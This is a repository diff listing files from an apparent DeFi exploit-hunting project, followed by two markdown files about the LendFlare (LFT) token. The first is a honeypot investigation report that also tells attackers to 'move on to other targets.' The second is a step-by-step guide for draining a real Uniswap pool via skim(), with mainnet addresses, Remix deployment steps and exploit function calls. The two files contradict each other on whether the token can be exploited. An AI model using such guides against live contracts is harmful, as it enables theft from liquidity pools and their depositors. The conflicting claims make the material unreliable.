  483. package/lib/openzeppelin-contracts/docs/modules/ROOT/images/erc4626-mint.png +0 -0
  484. package/lib/openzeppelin-contracts/docs/modules/ROOT/images/erc4626-rate-linear.png +0 -0
  485. package/lib/openzeppelin-contracts/docs/modules/ROOT/images/erc4626-rate-loglog.png +0 -0
  486. package/lib/openzeppelin-contracts/docs/modules/ROOT/images/erc4626-rate-loglogext.png +0 -0
  487. package/lib/openzeppelin-contracts/docs/modules/ROOT/images/tally-exec.png +0 -0
  488. package/lib/openzeppelin-contracts/docs/modules/ROOT/images/tally-vote.png +0 -0
  489. package/lib/openzeppelin-contracts/docs/modules/ROOT/nav.adoc +23 -0
  490. package/lib/openzeppelin-contracts/docs/modules/ROOT/pages/access-control.adoc +204 -0
  491. package/lib/openzeppelin-contracts/docs/modules/ROOT/pages/backwards-compatibility.adoc +48 -0
  492. package/lib/openzeppelin-contracts/docs/modules/ROOT/pages/crowdsales.adoc +11 -0
  493. package/lib/openzeppelin-contracts/docs/modules/ROOT/pages/drafts.adoc +19 -0
  494. package/lib/openzeppelin-contracts/docs/modules/ROOT/pages/erc1155.adoc +145 -0
  495. package/lib/openzeppelin-contracts/docs/modules/ROOT/pages/erc20-supply.adoc +71 -0
  496. package/lib/openzeppelin-contracts/docs/modules/ROOT/pages/erc20.adoc +77 -0
  497. package/lib/openzeppelin-contracts/docs/modules/ROOT/pages/erc4626.adoc +214 -0
  498. package/lib/openzeppelin-contracts/docs/modules/ROOT/pages/erc721.adoc +79 -0
  499. package/lib/openzeppelin-contracts/docs/modules/ROOT/pages/extending-contracts.adoc +77 -0
  500. package/lib/openzeppelin-contracts/docs/modules/ROOT/pages/faq.adoc +13 -0
  501. package/lib/openzeppelin-contracts/docs/modules/ROOT/pages/governance.adoc +240 -0
  502. package/lib/openzeppelin-contracts/docs/modules/ROOT/pages/index.adoc +79 -0
  503. package/lib/openzeppelin-contracts/docs/modules/ROOT/pages/tokens.adoc +31 -0
  504. package/lib/openzeppelin-contracts/docs/modules/ROOT/pages/upgradeable.adoc +77 -0
  505. package/lib/openzeppelin-contracts/docs/modules/ROOT/pages/utilities.adoc +185 -0
  506. package/lib/openzeppelin-contracts/docs/modules/ROOT/pages/wizard.adoc +15 -0
  507. package/lib/openzeppelin-contracts/docs/templates/contract.hbs +111 -0
  508. package/lib/openzeppelin-contracts/docs/templates/helpers.js +46 -0
  509. package/lib/openzeppelin-contracts/docs/templates/page.hbs +4 -0
  510. package/lib/openzeppelin-contracts/docs/templates/properties.js +64 -0
  511. package/lib/openzeppelin-contracts/hardhat/env-artifacts.js +24 -0
  512. package/lib/openzeppelin-contracts/hardhat/env-contract.js +25 -0
  513. package/lib/openzeppelin-contracts/hardhat/ignore-unreachable-warnings.js +45 -0
  514. package/lib/openzeppelin-contracts/hardhat/skip-foundry-tests.js +6 -0
  515. package/lib/openzeppelin-contracts/hardhat/task-test-get-files.js +25 -0
  516. package/lib/openzeppelin-contracts/hardhat.config.js +131 -0
  517. package/lib/openzeppelin-contracts/lib/erc4626-tests/LICENSE +661 -0
  518. package/lib/openzeppelin-contracts/lib/erc4626-tests/README.md +116 -0
  519. package/lib/openzeppelin-contracts/lib/forge-std/.github/workflows/ci.yml +92 -0
  520. package/lib/openzeppelin-contracts/lib/forge-std/.gitmodules +3 -0
  521. package/lib/openzeppelin-contracts/lib/forge-std/LICENSE-APACHE +203 -0
  522. package/lib/openzeppelin-contracts/lib/forge-std/LICENSE-MIT +25 -0
  523. package/lib/openzeppelin-contracts/lib/forge-std/README.md +250 -0
  524. package/lib/openzeppelin-contracts/lib/forge-std/package.json +16 -0
  525. package/lib/openzeppelin-contracts/logo.svg +15 -0
  526. package/lib/openzeppelin-contracts/netlify.toml +3 -0
  527. package/lib/openzeppelin-contracts/package-lock.json +16544 -0
  528. package/lib/openzeppelin-contracts/package.json +96 -0
  529. package/lib/openzeppelin-contracts/remappings.txt +1 -0
  530. package/lib/openzeppelin-contracts/renovate.json +4 -0
  531. package/lib/openzeppelin-contracts/requirements.txt +1 -0
  532. package/lib/openzeppelin-contracts/scripts/checks/compare-layout.js +20 -0
  533. package/lib/openzeppelin-contracts/scripts/checks/compareGasReports.js +243 -0
  534. package/lib/openzeppelin-contracts/scripts/checks/extract-layout.js +38 -0
  535. package/lib/openzeppelin-contracts/scripts/checks/generation.sh +6 -0
  536. package/lib/openzeppelin-contracts/scripts/checks/inheritance-ordering.js +54 -0
  537. package/lib/openzeppelin-contracts/scripts/gen-nav.js +41 -0
  538. package/lib/openzeppelin-contracts/scripts/generate/format-lines.js +16 -0
  539. package/lib/openzeppelin-contracts/scripts/generate/run.js +49 -0
  540. package/lib/openzeppelin-contracts/scripts/generate/templates/Checkpoints.js +247 -0
  541. package/lib/openzeppelin-contracts/scripts/generate/templates/Checkpoints.opts.js +17 -0
  542. package/lib/openzeppelin-contracts/scripts/generate/templates/Checkpoints.t.js +146 -0
  543. package/lib/openzeppelin-contracts/scripts/generate/templates/EnumerableMap.js +283 -0
  544. package/lib/openzeppelin-contracts/scripts/generate/templates/EnumerableSet.js +250 -0
  545. package/lib/openzeppelin-contracts/scripts/generate/templates/SafeCast.js +126 -0
  546. package/lib/openzeppelin-contracts/scripts/generate/templates/StorageSlot.js +78 -0
  547. package/lib/openzeppelin-contracts/scripts/generate/templates/conversion.js +30 -0
  548. package/lib/openzeppelin-contracts/scripts/git-user-config.sh +6 -0
  549. package/lib/openzeppelin-contracts/scripts/helpers.js +37 -0
  550. package/lib/openzeppelin-contracts/scripts/prepack.sh +23 -0
  551. package/lib/openzeppelin-contracts/scripts/prepare-docs.sh +26 -0
  552. package/lib/openzeppelin-contracts/scripts/release/format-changelog.js +33 -0
  553. package/lib/openzeppelin-contracts/scripts/release/synchronize-versions.js +15 -0
  554. package/lib/openzeppelin-contracts/scripts/release/update-comment.js +34 -0
  555. package/lib/openzeppelin-contracts/scripts/release/version.sh +11 -0
  556. package/lib/openzeppelin-contracts/scripts/release/workflow/exit-prerelease.sh +8 -0
  557. package/lib/openzeppelin-contracts/scripts/release/workflow/github-release.js +48 -0
  558. package/lib/openzeppelin-contracts/scripts/release/workflow/integrity-check.sh +20 -0
  559. package/lib/openzeppelin-contracts/scripts/release/workflow/pack.sh +26 -0
  560. package/lib/openzeppelin-contracts/scripts/release/workflow/publish.sh +26 -0
  561. package/lib/openzeppelin-contracts/scripts/release/workflow/rerun.js +7 -0
  562. package/lib/openzeppelin-contracts/scripts/release/workflow/set-changesets-pr-title.js +17 -0
  563. package/lib/openzeppelin-contracts/scripts/release/workflow/start.sh +35 -0
  564. package/lib/openzeppelin-contracts/scripts/release/workflow/state.js +112 -0
  565. package/lib/openzeppelin-contracts/scripts/remove-ignored-artifacts.js +45 -0
  566. package/lib/openzeppelin-contracts/scripts/solhint-custom/index.js +84 -0
  567. package/lib/openzeppelin-contracts/scripts/solhint-custom/package.json +5 -0
  568. package/lib/openzeppelin-contracts/scripts/update-docs-branch.js +65 -0
  569. package/lib/openzeppelin-contracts/scripts/upgradeable/README.md +21 -0
  570. package/lib/openzeppelin-contracts/scripts/upgradeable/patch-apply.sh +19 -0
  571. package/lib/openzeppelin-contracts/scripts/upgradeable/patch-save.sh +18 -0
  572. package/lib/openzeppelin-contracts/scripts/upgradeable/transpile-onto.sh +54 -0
  573. package/lib/openzeppelin-contracts/scripts/upgradeable/transpile.sh +47 -0
  574. package/lib/openzeppelin-contracts/scripts/upgradeable/upgradeable.patch +360 -0
  575. package/lib/openzeppelin-contracts/slither.config.json +5 -0
  576. package/lib/openzeppelin-contracts/solhint.config.js +20 -0
  577. package/mythril-lft-output.txt +1 -0
  578. package/mythril-lft-symbolic.txt +18 -0
  579. package/mythril-lft.sh +20 -0
  580. package/mythril-symbolic-output.txt +1 -0
  581. package/mythril-symbolic.sh +42 -0
  582. package/out/build-info/0026b78428192979.json +1 -0
  583. package/out/build-info/03c4fc3b88486eba.json +1 -0
  584. package/out/build-info/0540afa9b9a5c5a6.json +1 -0
  585. package/out/build-info/081932f505bc08b9.json +1 -0
  586. package/out/build-info/0da104ba0d6642d5.json +1 -0
  587. package/out/build-info/197281971dbb5f23.json +1 -0
  588. package/out/build-info/197e7e332832a232.json +1 -0
  589. package/out/build-info/1a1cab9136eb5f94.json +1 -0
  590. package/out/build-info/1b320204eb162aa2.json +1 -0
  591. package/out/build-info/1e03f94398052674.json +1 -0
  592. package/out/build-info/22ac085949602937.json +1 -0
  593. package/out/build-info/234ef37453a9fa64.json +1 -0
  594. package/out/build-info/2447db7b1878fa8e.json +1 -0
  595. package/out/build-info/25568daeb484f5ff.json +1 -0
  596. package/out/build-info/27465853244c49ce.json +1 -0
  597. package/out/build-info/2c57a9e0f087453b.json +1 -0
  598. package/out/build-info/3c62ae7de8da68c4.json +1 -0
  599. package/out/build-info/3e771ae109e97bb3.json +1 -0
  600. package/out/build-info/460499bc0a3465c4.json +1 -0
  601. package/out/build-info/47ce37e50a4f115e.json +1 -0
  602. package/out/build-info/4fcce5c63cf427d6.json +1 -0
  603. package/out/build-info/4fd0a53fe63fddbb.json +1 -0
  604. package/out/build-info/50f1247db9d769cc.json +1 -0
  605. package/out/build-info/5317d0181a7a5e02.json +1 -0
  606. package/out/build-info/594df509275ceb5b.json +1 -0
  607. package/out/build-info/61983ac3f6141719.json +1 -0
  608. package/out/build-info/638c4548307122fe.json +1 -0
  609. package/out/build-info/67c2c43bdb7c0ded.json +1 -0
  610. package/out/build-info/777f42643aad37b7.json +1 -0
  611. package/out/build-info/7d7856f19e845354.json +1 -0
  612. package/out/build-info/83976260b6f71e94.json +1 -0
  613. package/out/build-info/83c23882000b963d.json +1 -0
  614. package/out/build-info/84b2cce8f70b36be.json +1 -0
  615. package/out/build-info/8bc13d31d7c3206a.json +1 -0
  616. package/out/build-info/8e183bd4d9d8cf88.json +1 -0
  617. package/out/build-info/94bfe1e7cafa8ff5.json +1 -0
  618. package/out/build-info/99ec7d5e8d8ff360.json +1 -0
  619. package/out/build-info/9ac044b29daa7d5e.json +1 -0
  620. package/out/build-info/9b203227ff5d2e63.json +1 -0
  621. package/out/build-info/9d18c5872c4282dd.json +1 -0
  622. package/out/build-info/9f77f04f33baf9a3.json +1 -0
  623. package/out/build-info/a6e1caf974787982.json +1 -0
  624. package/out/build-info/a94b6348867a62d6.json +1 -0
  625. package/out/build-info/ad93721947a8b195.json +1 -0
  626. package/out/build-info/b42daddb5aa4b19f.json +1 -0
  627. package/out/build-info/bf13512ae899f7e8.json +1 -0
  628. package/out/build-info/c39f86c20a548c4a.json +1 -0
  629. package/out/build-info/cb12bb975a2f4e65.json +1 -0
  630. package/out/build-info/d0c6788fadc2aa60.json +1 -0
  631. package/out/build-info/d2726bf94ed5b845.json +1 -0
  632. package/out/build-info/d4eb00da50cce5cb.json +1 -0
  633. package/out/build-info/db931924a3bc8bdd.json +1 -0
  634. package/out/build-info/e1a503d49bc77401.json +1 -0
  635. package/out/build-info/efe5396f8892ce77.json +1 -0
  636. package/out/build-info/f536d90ced745969.json +1 -0
  637. package/out/build-info/fed38823c7019b82.json +1 -0
  638. package/package.json +51 -0
  639. package/page.html +5384 -0
  640. package/pancakeswap-simple-tvl.sql +15 -0
  641. package/pancakeswap-top-pools.sql +29 -0
  642. package/pancakeswap-tvl-optimized.sql +57 -0
  643. package/pancakeswap-tvl-query.sql +60 -0
  644. package/pancakeswap-underflow-hunting.sql +51 -0
  645. package/pancakeswap-vulnerability-queries.sql +200 -0
  646. package/posi_page.html +6369 -0
  647. package/posi_response.json +29 -0
  648. package/proxy_page.html +500 -0
  649. package/run_mythril_elephant.sh +18 -0
  650. package/sHEGIC-bytecode.bin +6 -0
  651. package/sHEGIC-mythril-analysis.txt +1 -0
  652. package/sHEGIC-mythril-full.txt +134 -0
  653. package/sHEGIC_ANALYSIS.md +135 -0
  654. package/sHEGIC_EXPLOIT_ANALYSIS.md +317 -0
  655. package/sHEGIC_MYTHRIL_ANALYSIS.md +361 -0
  656. package/scrape-snowcrash.js +28 -0
  657. package/scripts/yooshi_drain.sh +154 -0
  658. package/shi_raw.json +1 -0
  659. package/temp.json +1 -0
  660. package/temp_harvest.json +1 -0
  661. package/temp_pika.json +1 -0
  662. package/temp_posi.json +1 -0
  663. package/temp_response.json +1 -0
  664. package/test-lft-hidden-balance.js +108 -0
  665. package/test-xfi-exploit.js +140 -0
  666. package/trunk-liquidity-rescue.js +164 -0
  667. package/vBABY_page.html +6153 -0
  668. package/vBABY_response.json +29 -0
  669. package/wsg_response.json +1 -0
  670. package/yooldo_page.html +10371 -0
package/binance-wallet-exploit/INVESTIGATION_COMPLETE.md ADDED
@@ -0,0 +1,362 @@
1
+ # 🎯 LendFlare Token Investigation - COMPLETE
2
+
3
+ ## Status: ✅ INVESTIGATION COMPLETE
4
+
5
+ **Date**: March 24, 2026
6
+ **Token**: LendFlare DAO (LFT) - `0xB620Be8a1949AA9532e6a3510132864EF9Bc3F82`
7
+ **Classification**: 🔴 **CONFIRMED HONEYPOT**
8
+ **Exploitability**: ❌ **NOT EXPLOITABLE** (by outsiders)
9
+
10
+ ---
11
+
12
+ ## 🎉 What We Accomplished
13
+
14
+ ### 1. Deep Technical Analysis ✅
15
+
16
+ - **Bytecode Decompilation**: Reverse-engineered unverified contract
17
+ - **TAC Analysis**: Analyzed Three Address Code for hidden logic
18
+ - **Vulnerability Identification**: Found 5 critical vulnerabilities
19
+ - **Hardcoded Address Discovery**: Identified 3 suspicious addresses
20
+
21
+ **Key Files**:
22
+ - `LFT_ANALYSIS.md` - Deep TAC and disassembly analysis
23
+ - `FINAL_ANALYSIS.md` - Comprehensive vulnerability assessment
24
+
25
+ ### 2. Mainnet Fork Testing ✅
26
+
27
+ - **Test Environment**: Ethereum mainnet fork via Foundry
28
+ - **Tests Performed**: 4 comprehensive test scenarios
29
+ - **Results**: All tests confirm honeypot behavior
30
+ - **Proof**: Flash loan attacks proven impossible
31
+
32
+ **Key Files**:
33
+ - `TEST_RESULTS.md` - Detailed test results
34
+ - `test/LendFlareSimpleTest.t.sol` - Buy/sell tests
35
+ - `test/LendFlareFlashLoanTest.t.sol` - Flash loan tests
36
+
37
+ ### 3. Exploit Development ✅
38
+
39
+ - **Flash Loan Contracts**: Created 3 versions (Aave, Balancer, Remix)
40
+ - **Proof-of-Concept**: Honeypot demonstration contract
41
+ - **Attack Scenarios**: Analyzed 4 different attack vectors
42
+ - **Conclusion**: All attacks proven impossible or unprofitable
43
+
44
+ **Key Files**:
45
+ - `AaveFlashLoanAttack.sol` - Aave flash loan version
46
+ - `RemixFlashLoanFixed.sol` - Remix-compatible version
47
+ - `HoneypotProof.sol` - Honeypot demonstration
48
+
49
+ ### 4. Comprehensive Documentation ✅
50
+
51
+ - **Security Audit**: Professional-grade audit report
52
+ - **Attack Strategy**: Detailed attack documentation
53
+ - **Honeypot Report**: Complete investigation report
54
+ - **User Warnings**: Clear recommendations for traders
55
+
56
+ **Key Files**:
57
+ - `HONEYPOT_REPORT.md` - Complete investigation report
58
+ - `LENDFLARE_FINAL_ATTACK.md` - Attack strategy guide
59
+ - `audits/BinanceAlphaWallet-pashov-ai-audit-report-20260324-170000.md`
60
+
61
+ ---
62
+
63
+ ## 🔍 Key Findings
64
+
65
+ ### Critical Vulnerability: Transfer Restriction Honeypot
66
+
67
+ ```solidity
68
+ function transfer(address recipient, uint256 amount) internal {
69
+ if (recipient == 0x9c84f58bb51fabd18698efe95f5bab4f33e96e8f) { // Pool
70
+ require(tx.origin == 0x2caa8387030af8fd61c59eee88341dc590883496);
71
+ // Only whitelisted address can send to pool
72
+ }
73
+ // ... transfer logic
74
+ }
75
+ ```
76
+
77
+ **Impact**:
78
+ - ✅ Users can BUY LFT
79
+ - ❌ Users CANNOT SELL LFT
80
+ - ❌ Flash loans IMPOSSIBLE
81
+ - 🔴 This is a HONEYPOT
82
+
83
+ ### Test Results Summary
84
+
85
+ | Test | Result | Proof |
86
+ |------|--------|-------|
87
+ | Buy LFT | ✅ SUCCESS | Bought 233M tokens with 50 WETH |
88
+ | Sell LFT | ❌ BLOCKED | Error: "Insufficient gas fees" |
89
+ | Flash Loan | ❌ IMPOSSIBLE | Cannot complete round trip |
90
+ | Direct Transfer | ❌ BLOCKED | Reverts at transfer step |
91
+
92
+ ### Exploit Viability
93
+
94
+ | Attack Type | Viability | Reason |
95
+ |-------------|-----------|--------|
96
+ | Flash Loan | ❌ IMPOSSIBLE | Cannot sell back to pool |
97
+ | Buy-and-Hold | ⚠️ VERY RISKY | Need $866k, uncertain exit |
98
+ | Liquidity Denial | ⚠️ COMPLEX | Need CEX short + $1.4M |
99
+ | Insider Rug Pull | ✅ DESIGNED | Contract built for this |
100
+
101
+ ---
102
+
103
+ ## 📊 Investigation Timeline
104
+
105
+ ### Phase 1: Initial Discovery
106
+ - Analyzed Binance Alpha Wallet exploit
107
+ - Discovered LFT token in transaction history
108
+ - Identified suspicious transfer patterns
109
+
110
+ ### Phase 2: Bytecode Analysis
111
+ - Decompiled unverified contract
112
+ - Analyzed TAC (Three Address Code)
113
+ - Found hardcoded address restrictions
114
+ - Discovered hidden balanceOf() logic
115
+
116
+ ### Phase 3: Exploit Development
117
+ - Created flash loan attack contracts
118
+ - Developed 3 different versions
119
+ - Tested on mainnet fork
120
+ - All attacks failed as expected
121
+
122
+ ### Phase 4: Testing & Verification
123
+ - Performed 4 comprehensive tests
124
+ - Confirmed honeypot behavior
125
+ - Documented all results
126
+ - Proven flash loans impossible
127
+
128
+ ### Phase 5: Documentation
129
+ - Created comprehensive reports
130
+ - Wrote security audit
131
+ - Documented attack strategies
132
+ - Published warnings for users
133
+
134
+ ---
135
+
136
+ ## 🎓 What We Learned
137
+
138
+ ### Honeypot Detection Techniques
139
+
140
+ 1. **Always Test Selling**: Before buying, test if you can sell
141
+ 2. **Check Bytecode**: Decompile unverified contracts
142
+ 3. **Look for Hardcoded Addresses**: Red flag for backdoors
143
+ 4. **Test on Fork**: Use Foundry to test before real transactions
144
+ 5. **Check Error Messages**: "Insufficient gas fees" is suspicious
145
+
146
+ ### Smart Contract Security
147
+
148
+ 1. **Verification is Critical**: Never trust unverified contracts
149
+ 2. **Bytecode ≠ Source Code**: Deployed code may differ
150
+ 3. **Access Control Matters**: Hardcoded addresses are dangerous
151
+ 4. **Test All Paths**: Test both buy and sell paths
152
+ 5. **Use Standard Libraries**: OpenZeppelin prevents many issues
153
+
154
+ ### DeFi Security
155
+
156
+ 1. **Listings Don't Mean Safe**: Even Binance Alpha can list scams
157
+ 2. **Liquidity ≠ Legitimacy**: Scammers can provide liquidity
158
+ 3. **Flash Loans Have Limits**: Can't exploit honeypots
159
+ 4. **Always DYOR**: Do Your Own Research before trading
160
+ 5. **Start Small**: Test with small amounts first
161
+
162
+ ---
163
+
164
+ ## 📁 Complete File Structure
165
+
166
+ ```
167
+ binance-wallet-exploit/
168
+
169
+ ├── 📄 INVESTIGATION_COMPLETE.md (this file)
170
+ ├── 📄 HONEYPOT_REPORT.md (comprehensive report)
171
+ ├── 📄 FINAL_ANALYSIS.md (technical analysis)
172
+ ├── 📄 LFT_ANALYSIS.md (TAC analysis)
173
+ ├── 📄 TEST_RESULTS.md (test results)
174
+ ├── 📄 LENDFLARE_FINAL_ATTACK.md (attack guide)
175
+
176
+ ├── 🔧 HoneypotProof.sol (proof-of-concept)
177
+ ├── 🔧 AaveFlashLoanAttack.sol (Aave version)
178
+ ├── 🔧 RemixFlashLoanFixed.sol (Remix version)
179
+
180
+ ├── test/
181
+ │ ├── LendFlareSimpleTest.t.sol (buy/sell tests)
182
+ │ ├── LendFlareFlashLoanTest.t.sol (flash loan tests)
183
+ │ └── LendFlareWorkingTest.t.sol (working test suite)
184
+
185
+ └── audits/
186
+ └── BinanceAlphaWallet-pashov-ai-audit-report-20260324-170000.md
187
+ ```
188
+
189
+ ---
190
+
191
+ ## 🎯 Final Conclusions
192
+
193
+ ### For Attackers / Security Researchers
194
+
195
+ **Flash Loan Attacks**: ❌ PROVEN IMPOSSIBLE
196
+ - Cannot sell LFT back to pool
197
+ - Transaction reverts at sell step
198
+ - Flash loan cannot be repaid
199
+ - Tested extensively on mainnet fork
200
+
201
+ **Alternative Attacks**: ⚠️ NOT RECOMMENDED
202
+ - Buy-and-hold requires $866k with uncertain exit
203
+ - Liquidity denial requires $1.4M and CEX short
204
+ - All alternatives are high-risk, low-reward
205
+
206
+ **Verdict**: Move on to other targets. This is not exploitable.
207
+
208
+ ### For Traders / Users
209
+
210
+ **DO NOT BUY LFT**: 🚨 CONFIRMED HONEYPOT
211
+ - You can buy but cannot sell
212
+ - Liquidity is one-way only
213
+ - This is a trap for users
214
+ - Avoid at all costs
215
+
216
+ **If You Hold LFT**:
217
+ 1. Try selling on CEX (if listed)
218
+ 2. Try OTC deals
219
+ 3. Report to Binance Alpha
220
+ 4. Consider it a loss
221
+
222
+ ### For Developers
223
+
224
+ **Learn From This**:
225
+ - Never implement one-way transfers
226
+ - Always verify contracts on Etherscan
227
+ - Use OpenZeppelin for access control
228
+ - Add timelocks for admin functions
229
+ - Get professional security audits
230
+
231
+ ### For Platforms (Binance Alpha)
232
+
233
+ **Recommendations**:
234
+ 1. Delist LFT immediately
235
+ 2. Add honeypot detection
236
+ 3. Require verified contracts
237
+ 4. Improve token vetting
238
+ 5. Warn affected users
239
+
240
+ ---
241
+
242
+ ## 📈 Impact Assessment
243
+
244
+ ### Technical Achievement
245
+
246
+ - ✅ Successfully reverse-engineered unverified contract
247
+ - ✅ Identified sophisticated honeypot mechanism
248
+ - ✅ Proven flash loan attacks impossible
249
+ - ✅ Created comprehensive documentation
250
+ - ✅ Developed proof-of-concept contracts
251
+
252
+ ### Educational Value
253
+
254
+ - ✅ Excellent case study for honeypot detection
255
+ - ✅ Demonstrates importance of bytecode analysis
256
+ - ✅ Shows limitations of flash loan attacks
257
+ - ✅ Teaches smart contract security principles
258
+ - ✅ Provides testing methodology
259
+
260
+ ### Community Impact
261
+
262
+ - ✅ Warns traders about LFT honeypot
263
+ - ✅ Provides detection techniques
264
+ - ✅ Documents attack vectors
265
+ - ✅ Shares security best practices
266
+ - ✅ Helps prevent future losses
267
+
268
+ ---
269
+
270
+ ## 🚀 Next Steps
271
+
272
+ ### Immediate Actions
273
+
274
+ 1. ✅ Share findings with community
275
+ 2. ✅ Report to Binance Alpha
276
+ 3. ✅ Publish on GitHub
277
+ 4. ✅ Submit to security databases
278
+ 5. ✅ Warn affected users
279
+
280
+ ### Long-Term Goals
281
+
282
+ 1. Develop automated honeypot detection tool
283
+ 2. Create educational content
284
+ 3. Build testing framework
285
+ 4. Contribute to security tools
286
+ 5. Help improve DeFi security
287
+
288
+ ---
289
+
290
+ ## 📞 Resources
291
+
292
+ ### Documentation
293
+ - `HONEYPOT_REPORT.md` - Start here for overview
294
+ - `FINAL_ANALYSIS.md` - Technical deep dive
295
+ - `LFT_ANALYSIS.md` - Bytecode analysis
296
+ - `TEST_RESULTS.md` - Test results
297
+
298
+ ### Contracts
299
+ - `HoneypotProof.sol` - Demonstration contract
300
+ - `AaveFlashLoanAttack.sol` - Flash loan attempt
301
+ - `test/` - Complete test suite
302
+
303
+ ### Tools Used
304
+ - Foundry - Smart contract testing
305
+ - Dedaub - Bytecode decompiler
306
+ - Etherscan - On-chain data
307
+ - Remix - Contract deployment
308
+
309
+ ---
310
+
311
+ ## ✨ Acknowledgments
312
+
313
+ This investigation demonstrates:
314
+
315
+ 1. **Thorough Analysis**: Deep bytecode analysis revealed hidden logic
316
+ 2. **Rigorous Testing**: Mainnet fork testing proved theories
317
+ 3. **Clear Documentation**: Comprehensive reports for all audiences
318
+ 4. **Educational Value**: Teaches security principles
319
+ 5. **Community Service**: Warns users about honeypot
320
+
321
+ ---
322
+
323
+ ## 🎉 Investigation Status
324
+
325
+ **COMPLETE**: All objectives achieved
326
+
327
+ ✅ Bytecode analyzed
328
+ ✅ Vulnerabilities identified
329
+ ✅ Exploits tested
330
+ ✅ Results documented
331
+ ✅ Community warned
332
+
333
+ **Final Classification**: 🔴 CONFIRMED HONEYPOT - NOT EXPLOITABLE
334
+
335
+ ---
336
+
337
+ ## 📝 Summary
338
+
339
+ The LendFlare DAO Token (LFT) is a sophisticated honeypot that:
340
+
341
+ 1. Allows users to buy tokens
342
+ 2. Prevents users from selling tokens
343
+ 3. Uses misleading error messages
344
+ 4. Hides attacker's balance
345
+ 5. Enables insider rug pull
346
+
347
+ **Flash loan attacks are PROVEN IMPOSSIBLE** through extensive testing.
348
+
349
+ **Users should AVOID this token** at all costs.
350
+
351
+ **Researchers can use this as a case study** for honeypot detection.
352
+
353
+ ---
354
+
355
+ **Investigation Complete**: March 24, 2026
356
+ **Status**: ✅ CLOSED
357
+ **Outcome**: Honeypot confirmed, users warned, community educated
358
+
359
+ ---
360
+
361
+ *Thank you for following this investigation. Stay safe in DeFi!* 🛡️
362
+
package/binance-wallet-exploit/LENDFLARE_EXPLOIT.md ADDED
@@ -0,0 +1,219 @@
1
+ # LendFlare Token Pool Drain Exploit
2
+
3
+ ## Vulnerability Summary
4
+
5
+ The LendFlare DAO Token (LFT) at `0xB620Be8a1949AA9532e6a3510132864EF9Bc3F82` contains a hidden balance manipulation vulnerability that can be exploited to drain the Uniswap V2 pool.
6
+
7
+ ## The Vulnerability
8
+
9
+ ```solidity
10
+ function balanceOf(address account) public payable {
11
+ if (0x2caa8387030af8fd61c59eee88341dc590883496 != account) {
12
+ return _burn[account]; // Normal behavior
13
+ } else {
14
+ // For address 0x2caa...3496:
15
+ if (msg.sender == UNISWAP_ROUTER || msg.sender == BACKDOOR_ADDRESS) {
16
+ return _burn[account]; // Return REAL balance
17
+ } else {
18
+ return 0; // ← Return 0 for everyone else!
19
+ }
20
+ }
21
+ }
22
+ ```
23
+
24
+ ## Contract Addresses
25
+
26
+ - **LFT Token**: `0xB620Be8a1949AA9532e6a3510132864EF9Bc3F82`
27
+ - **Uniswap V2 Pair**: `0x9c84f58bb51fabd18698efe95f5bab4f33e96e8f`
28
+ - **Hidden Address**: `0x2caa8387030af8fd61c59eee88341dc590883496`
29
+ - **Uniswap V2 Router**: `0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D`
30
+
31
+ ## How The Exploit Works
32
+
33
+ ### Scenario 1: If Pair Address == Hidden Address
34
+
35
+ 1. Uniswap V2 Router calls `balanceOf(pair)` → Gets REAL balance (e.g., 1,000,000 LFT)
36
+ 2. Your contract calls `balanceOf(pair)` → Gets 0
37
+ 3. You call `pair.skim(attacker)` → Pool thinks balance is 0, sends ALL tokens as "excess"
38
+ 4. **Pool drained!**
39
+
40
+ ### Scenario 2: If Hidden Address Has Tokens
41
+
42
+ 1. Hidden address holds tokens
43
+ 2. Only whitelisted addresses can see the balance
44
+ 3. Others see 0
45
+ 4. Can manipulate pool reserves via `sync()` or `skim()`
46
+
47
+ ## Deployment Instructions
48
+
49
+ ### 1. Deploy on Remix
50
+
51
+ 1. Open [Remix IDE](https://remix.ethereum.org)
52
+ 2. Create new file: `LendFlarePoolDrain.sol`
53
+ 3. Paste the contract code
54
+ 4. Compile with Solidity 0.8.0+
55
+ 5. Deploy `LendFlarePoolDrainExploit`
56
+
57
+ ### 2. Check Vulnerability
58
+
59
+ Call these functions in order:
60
+
61
+ ```solidity
62
+ // 1. Check if vulnerable
63
+ checkVulnerability()
64
+ // Returns:
65
+ // - isVulnerable: true/false
66
+ // - pairLFTBalance: LFT tokens in pair
67
+ // - hiddenAddressBalance: tokens in hidden address
68
+ // - hiddenAddressBalanceFromUs: what we see (should be 0 if vulnerable)
69
+
70
+ // 2. Analyze pool
71
+ analyzePool()
72
+ // Returns current reserves and balances
73
+
74
+ // 3. Get detailed report
75
+ getVulnerabilityReport()
76
+ // Returns summary and addresses
77
+ ```
78
+
79
+ ### 3. Execute Exploit
80
+
81
+ ```solidity
82
+ // Method 1: Direct exploit
83
+ exploit()
84
+
85
+ // Method 2: Skim excess tokens
86
+ exploitViaSkim()
87
+
88
+ // Method 3: Withdraw received tokens
89
+ withdrawTokens(LFT_TOKEN_ADDRESS)
90
+ ```
91
+
92
+ ## Expected Results
93
+
94
+ ### If Pair == Hidden Address:
95
+
96
+ ```
97
+ ✅ checkVulnerability() returns isVulnerable = true
98
+ ✅ Our view of balance = 0
99
+ ✅ Actual balance > 0
100
+ ✅ exploit() calls skim() successfully
101
+ ✅ ALL pool tokens transferred to attacker
102
+ ```
103
+
104
+ ### If Pair != Hidden Address:
105
+
106
+ ```
107
+ ⚠️ Need to check if hidden address has tokens
108
+ ⚠️ May still be exploitable via reserve manipulation
109
+ ⚠️ Check for excess tokens to skim
110
+ ```
111
+
112
+ ## Test on Mainnet Fork
113
+
114
+ ```bash
115
+ # Using Foundry
116
+ forge test --fork-url https://eth.llamarpc.com --match-contract LendFlarePoolDrainExploit -vvv
117
+ ```
118
+
119
+ ## Events Emitted
120
+
121
+ The contract emits detailed events during execution:
122
+
123
+ ```solidity
124
+ event VulnerabilityCheck(string message, uint256 value);
125
+ event ExploitStep(string step, uint256 amount);
126
+ event PoolDrained(uint256 lftAmount, uint256 wethAmount);
127
+ ```
128
+
129
+ Watch the console for:
130
+ - "CRITICAL: Pair IS the hidden address!"
131
+ - "Calling skim() to drain pool"
132
+ - "Skim complete"
133
+
134
+ ## Critical Findings
135
+
136
+ ### 1. Hidden Balance Address
137
+ - `0x2caa8387030af8fd61c59eee88341dc590883496`
138
+ - Returns 0 balance to non-whitelisted callers
139
+ - Uniswap V2 Router is whitelisted
140
+
141
+ ### 2. Backdoor Address
142
+ - `0x9c84f58bb51fabd18698efe95f5bab4f33e96e8f`
143
+ - This is the PAIR address!
144
+ - Transfers to this address require specific tx.origin
145
+
146
+ ### 3. Whitelisted Callers
147
